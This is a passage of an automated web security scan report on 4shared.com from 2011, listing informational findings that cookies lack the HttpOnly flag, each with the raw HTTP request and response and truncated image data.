Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:32 GMT; Path=/
Set-Cookie: hostid=-1799129586; Expires=Mon, 26-Jul-2021 13:59:32 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:32 GMT
ETag: W/"6068-1305634966000"
Last-Modified: Tue, 17 May 2011 12:22:46 GMT
Content-Type: text/css
Content-Length: 6068
Date: Fri, 29 Jul 2011 13:59:32 GMT


.centered {margin: 2px auto auto;
width: 817px;
/* 30% of cool are being achieved with Lucida Grande font :)*/
font-family:"Lucida Grande", Helvetica, Arial, sans-serif;

}
.promoHeader {
...[SNIP]...

6.29. http://www.4shared.com/developer/images/devices.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /developer/images/devices.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developer/images/devices.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:26 GMT; Path=/
Set-Cookie: hostid=1887864838; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/
ETag: W/"62587-1299339830000"
Last-Modified: Sat, 05 Mar 2011 15:43:50 GMT
Content-Type: image/png
Content-Length: 62587
Date: Fri, 29 Jul 2011 14:00:25 GMT

.PNG
.
...IHDR...F............:....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.....$W}&....|.o.p'GMR.Q. ..$..
..,...I~.~.wmv.YX.={ml?c..x....e....H...Aq4...|s..................3.......|..g!.D...V,."
...[SNIP]...

6.30. http://www.4shared.com/developer/images/footer-corner.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /developer/images/footer-corner.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developer/images/footer-corner.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:28 GMT; Path=/
Set-Cookie: hostid=1996775946; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/
ETag: W/"500-1299339830000"
Last-Modified: Sat, 05 Mar 2011 15:43:50 GMT
Content-Type: image/png
Content-Length: 500
Date: Fri, 29 Jul 2011 14:00:28 GMT

.PNG
.
...IHDR.......$.....A.23....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....n.P.E..*(.F.:...%..8.y.'.......{...&..^..8 .....V....~...g%I.......T.a.Hw&t].C.A...S.N...X..`.^#..c..d    H..j..g.f..$.
...[SNIP]...

6.31. http://www.4shared.com/developer/images/title.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /developer/images/title.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developer/images/title.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:26 GMT; Path=/
Set-Cookie: hostid=1229403741; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/
ETag: W/"8184-1299339830000"
Last-Modified: Sat, 05 Mar 2011 15:43:50 GMT
Content-Type: image/png
Content-Length: 8184
Date: Fri, 29 Jul 2011 14:00:25 GMT

.PNG
.
...IHDR...h...;.....V..8....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..=m...u.....u.......%A..h.0......)r..M.(...A..n..P.,.q..q.Iia.q.;..(. ...X..]...S+>....P..sLW...A....}C.R{.....,.N.'..G
...[SNIP]...

6.32. http://www.4shared.com/enter.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enter.jsp?sId=Sdt45IRrRqsiuJEj&&fau=1&ausk=Sdt45IRrRqsiuJEj&au=1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 35973
Date: Fri, 29 Jul 2011 13:57:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or S
...[SNIP]...

6.33. http://www.4shared.com/images/1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:55 GMT; Path=/
Set-Cookie: hostid=-777753564; Expires=Mon, 26-Jul-2021 14:07:55 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:55 GMT
ETag: W/"249-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 249
Date: Fri, 29 Jul 2011 14:07:54 GMT

GIF89a...............................................................................t{......................!.......,..........v.#...0P...C....i......a$2.E.hXX..H......$.t....S@.P.2F$..v.<.."h..U+f.t
...[SNIP]...

6.34. http://www.4shared.com/images/2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:04 GMT; Path=/
Set-Cookie: hostid=-1089794149; Expires=Mon, 26-Jul-2021 14:08:04 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:04 GMT
ETag: W/"415-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 415
Date: Fri, 29 Jul 2011 14:08:04 GMT

GIF89a................z.....................................{................................{........z...............................z........................................................t{.....
...[SNIP]...

6.35. http://www.4shared.com/images/3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/3.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:52 GMT; Path=/
Set-Cookie: hostid=-1550842980; Expires=Mon, 26-Jul-2021 14:09:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:52 GMT
ETag: W/"399-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 399
Date: Fri, 29 Jul 2011 14:09:52 GMT

GIF89a............................z.......................{..{..................................................................................................t{......................................
...[SNIP]...

6.36. http://www.4shared.com/images/4.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/4.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/4.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:56 GMT; Path=/
Set-Cookie: hostid=-513556585; Expires=Mon, 26-Jul-2021 14:07:56 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:56 GMT
ETag: W/"403-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 403
Date: Fri, 29 Jul 2011 14:07:55 GMT

GIF89a.....1.......................................................................................................{..{........{............................................t{..........................
...[SNIP]...

6.37. http://www.4shared.com/images/bg10.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/bg10.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bg10.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:34 GMT; Path=/
Set-Cookie: hostid=172001427; Expires=Mon, 26-Jul-2021 13:59:34 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:34 GMT
ETag: W/"253-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/png
Content-Length: 253
Date: Fri, 29 Jul 2011 13:59:34 GMT

.PNG
.
...IHDR.......".......C#....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE......................z...Z.............    ....
........!..............$........".......}..~........6IDATx........ ......
...[SNIP]...

6.38. http://www.4shared.com/images/blueBanner_plus.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/blueBanner_plus.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/blueBanner_plus.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:19 GMT; Path=/
Set-Cookie: hostid=-2039896466; Expires=Mon, 26-Jul-2021 14:07:19 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:19 GMT
ETag: W/"1046-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1046
Date: Fri, 29 Jul 2011 14:07:18 GMT

GIF89a..........k.'h.+d.,|..~.....v..u..m.&z..........^.-c.+..s..b.....`.8z..j.&{..n..{..p.'q.$...Z.'......g.#......}. ..Iz...........x..n.&}..........e....O........K.....?..vt.....................
...[SNIP]...

6.39. http://www.4shared.com/images/bookmarks/newstyle/facebook.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/bookmarks/newstyle/facebook.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bookmarks/newstyle/facebook.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:26 GMT; Path=/
Set-Cookie: hostid=-795695071; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:26 GMT
ETag: W/"554-1301314722000"
Last-Modified: Mon, 28 Mar 2011 12:18:42 GMT
Content-Type: image/png
Content-Length: 554
Date: Fri, 29 Jul 2011 14:00:25 GMT

.PNG
.
...IHDR................a...    pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx...M/.A...]....^.4..88x.D88x...U".\.7p.-Hp.8.....W..X+.JC.[......T...\...<...gvG..[....    5....._..-.L
...[SNIP]...

6.40. http://www.4shared.com/images/bookmarks/newstyle/orkut.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/bookmarks/newstyle/orkut.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bookmarks/newstyle/orkut.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:28 GMT; Path=/
Set-Cookie: hostid=552594880; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:28 GMT
ETag: W/"794-1301314722000"
Last-Modified: Mon, 28 Mar 2011 12:18:42 GMT
Content-Type: image/png
Content-Length: 794
Date: Fri, 29 Jul 2011 14:00:28 GMT

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...ML.A......w.l.j.t.........HL....'..s..W...G=...M.D.$.D..`....P.(-...n.mwv.].Q....L.......{.../{[#.d...r0..Y....|>....
...[SNIP]...

6.41. http://www.4shared.com/images/bookmarks/newstyle/orkutshare.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/bookmarks/newstyle/orkutshare.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bookmarks/newstyle/orkutshare.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:06 GMT; Path=/
Set-Cookie: hostid=-1715885997; Expires=Mon, 26-Jul-2021 14:00:06 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:06 GMT
ETag: W/"1290-1305634976000"
Last-Modified: Tue, 17 May 2011 12:22:56 GMT
Content-Type: image/png
Content-Length: 1290
Date: Fri, 29 Jul 2011 14:00:05 GMT

.PNG
.
...IHDR...L.........'J......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..X]L#U..f.G................
.qA..`..(......f....!.D...$.......b`.`7....*eY.mK.....e...-.....df.=.....9.L9...d......".)
...[SNIP]...

6.42. http://www.4shared.com/images/bookmarks/newstyle/twitter.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/bookmarks/newstyle/twitter.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bookmarks/newstyle/twitter.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:26 GMT; Path=/
Set-Cookie: hostid=-380473347; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:26 GMT
ETag: W/"592-1301314722000"
Last-Modified: Mon, 28 Mar 2011 12:18:42 GMT
Content-Type: image/png
Content-Length: 592
Date: Fri, 29 Jul 2011 14:00:25 GMT

.PNG
.
...IHDR................a...    pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx..S.n.A.=3;^{c;..)B.-.U
..(.#7....'PR..A......A.@..T...I.(...cfv.;....D.......=...x....r..w....[....
...[SNIP]...

6.43. http://www.4shared.com/images/brdlefts.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/brdlefts.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/brdlefts.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:01 GMT; Path=/
Set-Cookie: hostid=-1505474669; Expires=Mon, 26-Jul-2021 14:08:01 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:01 GMT
ETag: W/"51-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 51
Date: Fri, 29 Jul 2011 14:08:00 GMT

GIF89a    ............~....!.......,....    ......D.)..;

6.44. http://www.4shared.com/images/brdrights.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/brdrights.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/brdrights.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:18 GMT; Path=/
Set-Cookie: hostid=430664651; Expires=Mon, 26-Jul-2021 14:08:18 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:18 GMT
ETag: W/"51-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 51
Date: Fri, 29 Jul 2011 14:08:18 GMT

GIF89a    ............~....!.......,....    ......./...;

6.45. http://www.4shared.com/images/butGetStarted.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/butGetStarted.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/butGetStarted.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:56 GMT; Path=/
Set-Cookie: hostid=-11666394; Expires=Mon, 26-Jul-2021 14:07:56 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:56 GMT
ETag: W/"3376-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 3376
Date: Fri, 29 Jul 2011 14:07:55 GMT

GIF89a.....V...................nv..........T].Yb.-9l..........#[......MW.rz......................=Hw.........IT.{..GQ...... -cfn.0<n`h.ir.|{..)`.........}..OY.$1f.....................................
...[SNIP]...

6.46. http://www.4shared.com/images/butGo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/butGo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/butGo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:57 GMT; Path=/
Set-Cookie: hostid=-2013721944; Expires=Mon, 26-Jul-2021 14:07:57 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:57 GMT
ETag: W/"724-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
